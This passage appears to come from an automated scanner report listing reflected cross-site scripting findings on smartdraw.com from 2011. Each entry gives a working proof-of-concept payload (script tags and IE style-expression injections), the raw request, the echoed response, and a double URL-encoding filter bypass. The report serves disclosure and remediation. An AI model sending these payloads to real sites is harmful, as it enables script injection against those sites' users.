<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/downloads96d2c"><script>alert(1)</script>26549339e2c/?id=340839/x22/x3eSmartDraw" rel="nofollow" target="_blank">
...[SNIP]...

3.134. http://www.smartdraw.com/downloads [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /downloads

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fd6e%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252271fe023e54 was submitted in the REST URL parameter 1. This input was echoed as 6fd6e"style="x:expression(alert(1))"71fe023e54 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /downloads6fd6e%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252271fe023e54 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:27 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:27 GMT; path=/
Set-Cookie: ASP.NET_SessionId=yyv5x0450piuis45ejmzuryy; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8739
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/downloads6fd6e"style="x:expression(alert(1))"71fe023e54/" rel="nofollow" target="_blank">
...[SNIP]...

3.135. http://www.smartdraw.com/downloads [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /downloads

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75a12%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25228ae5fca1f39 was submitted in the REST URL parameter 1. This input was echoed as 75a12"style="x:expression(alert(1))"8ae5fca1f39 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /75a12%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25228ae5fca1f39 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:31 GMT
Content-Length: 8683
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:31 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:31 GMT; path=/
Set-Cookie: ASP.NET_SessionId=jl33dq55fge2ij55usujg355; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/75a12"style="x:expression(alert(1))"8ae5fca1f39/&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80px
...[SNIP]...

3.136. http://www.smartdraw.com/downloads [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /downloads

Issue detail

The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1f7d"><script>alert(1)</script>1bd1fdf7711 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /downloads?id=340839/x22/x3eSmartDrawa1f7d"><script>alert(1)</script>1bd1fdf7711 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:29:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:19 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:19 GMT; path=/
Set-Cookie: ASP.NET_SessionId=t1kmf52brnpipl45gqynblnt; path=/; HttpOnly
Set-Cookie: SDPROSPECTID=6D7F9BCA-D794-4445-857B-A18698F1B8C9; expires=Sun, 03-Feb-2041 20:29:19 GMT; path=/
Set-Cookie: TRV=1; expires=Sun, 03-Feb-2041 20:29:19 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12947
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/downloads/index.htm?id=340839/x22/x3eSmartDrawa1f7d"><script>alert(1)</script>1bd1fdf7711" rel="nofollow" target="_blank">
...[SNIP]...

3.137. http://www.smartdraw.com/downloads [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /downloads

Issue detail

The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5facb"><script>alert(1)</script>49b68308620 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /downloads?id=5facb"><script>alert(1)</script>49b68308620 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:20 GMT
Content-Length: 12786
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:20 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:20 GMT; path=/
Set-Cookie: ASP.NET_SessionId=no3m3ona4ywt5ufehqdinuiv; path=/; HttpOnly
Set-Cookie: SDPROSPECTID=83434CAF-2F0B-4058-B666-16AC15340351; expires=Sun, 03-Feb-2041 20:29:20 GMT; path=/
Set-Cookie: TRV=1; expires=Sun, 03-Feb-2041 20:29:20 GMT; path=/
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/downloads/index.htm?id=5facb"><script>alert(1)</script>49b68308620&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80px;
...[SNIP]...

3.138. http://www.smartdraw.com/downloads [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /downloads

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8433d"><script>alert(1)</script>f5beed3ebcb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /downloads?8433d"><script>alert(1)</script>f5beed3ebcb=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:29:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:18 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:18 GMT; path=/
Set-Cookie: ASP.NET_SessionId=bx0e1x45yaxnbvqv5rl1lobn; path=/; HttpOnly
Set-Cookie: SDPROSPECTID=B5B6DB7A-34F1-4878-9BA4-22EAB7B1DC13; expires=Sun, 03-Feb-2041 20:29:18 GMT; path=/
Set-Cookie: TRV=1; expires=Sun, 03-Feb-2041 20:29:18 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12779
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/downloads/index.htm?8433d"><script>alert(1)</script>f5beed3ebcb=1" rel="nofollow" target="_blank">
...[SNIP]...

3.139. http://www.smartdraw.com/downloads [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /downloads

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9aec6"><script>alert(1)</script>133a985f46b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /downloads?9aec6"><script>alert(1)</script>133a985f46b=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:29:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:20 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:20 GMT; path=/
Set-Cookie: ASP.NET_SessionId=eu0eua45v2ntfszry5fsxg45; path=/; HttpOnly
Set-Cookie: SDPROSPECTID=5FEDCD2D-3EF7-4E28-9941-1289D6269030; expires=Sun, 03-Feb-2041 20:29:20 GMT; path=/
Set-Cookie: TRV=1; expires=Sun, 03-Feb-2041 20:29:20 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12779
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/downloads/index.htm?9aec6"><script>alert(1)</script>133a985f46b=1&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80p
...[SNIP]...

3.140. http://www.smartdraw.com/downloads/x22 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /downloads/x22

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2601%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522cc75ed19a87 was submitted in the REST URL parameter 1. This input was echoed as b2601"style="x:expression(alert(1))"cc75ed19a87 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /downloadsb2601%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522cc75ed19a87/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:48 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:48 GMT; path=/
Set-Cookie: ASP.NET_SessionId=gjwvvma5ouzgwz45mccvo0yz; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8774
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/downloadsb2601"style="x:expression(alert(1))"cc75ed19a87/x22/" rel="nofollow" target="_blank">
...[SNIP]...

3.141. http://www.smartdraw.com/downloads/x22 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /downloads/x22

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e0fd%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522c7b5f3c9049 was submitted in the REST URL parameter 1. This input was echoed as 7e0fd"style="x:expression(alert(1))"c7b5f3c9049 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /7e0fd%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522c7b5f3c9049/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:53 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:53 GMT; path=/
Set-Cookie: ASP.NET_SessionId=muhiv555hhwxlq45i4d30a2z; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8711
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/7e0fd"style="x:expression(alert(1))"c7b5f3c9049/x22/&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:
...[SNIP]...

3.142. http://www.smartdraw.com/downloads/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /downloads/x22

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba1e3%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25229c5fd0e07db was submitted in the REST URL parameter 2. This input was echoed as ba1e3"style="x:expression(alert(1))"9c5fd0e07db in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /downloads/x22ba1e3%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25229c5fd0e07db HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:56 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:56 GMT; path=/
Set-Cookie: ASP.NET_SessionId=jpp44c45no3vndyg0eiqfdaq; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8774
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/downloads/x22ba1e3"style="x:expression(alert(1))"9c5fd0e07db/" rel="nofollow" target="_blank">
...[SNIP]...

3.143. http://www.smartdraw.com/downloads/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /downloads/x22

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53118%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522c23085e6306 was submitted in the REST URL parameter 2. This input was echoed as 53118"style="x:expression(alert(1))"c23085e6306 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /downloads/53118%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522c23085e6306 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:30:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:30:00 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:30:00 GMT; path=/
Set-Cookie: ASP.NET_SessionId=slhjyjfmrcmjlrjjdpmdykfr; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8753
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/downloads/53118"style="x:expression(alert(1))"c23085e6306/&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80px
...[SNIP]...

3.144. http://www.smartdraw.com/downloads/x22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /downloads/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c9a5"style%3d"x%3aexpression(alert(1))"c2aa39074d2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5c9a5"style="x:expression(alert(1))"c2aa39074d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /downloads/x22?5c9a5"style%3d"x%3aexpression(alert(1))"c2aa39074d2=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:43 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:43 GMT; path=/
Set-Cookie: ASP.NET_SessionId=ssgwag55ef2suzf5q24jnl45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8795
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/downloads/x22/?5c9a5"style="x:expression(alert(1))"c2aa39074d2=1&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80p
...[SNIP]...

3.145. http://www.smartdraw.com/downloads/x22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /downloads/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43ce2"style%3d"x%3aexpression(alert(1))"09bdff38fc4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 43ce2"style="x:expression(alert(1))"09bdff38fc4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /downloads/x22?43ce2"style%3d"x%3aexpression(alert(1))"09bdff38fc4=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:41 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:41 GMT; path=/
Set-Cookie: ASP.NET_SessionId=tew4y345qibicu55t1rjfuqe; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8795
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/downloads/x22/?43ce2"style="x:expression(alert(1))"09bdff38fc4=1" rel="nofollow" target="_blank">
...[SNIP]...

3.146. http://www.smartdraw.com/examples/charts/x22 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /examples/charts/x22

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94da6%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522861bf406f44 was submitted in the REST URL parameter 1. This input was echoed as 94da6"style="x:expression(alert(1))"861bf406f44 in the application's response.

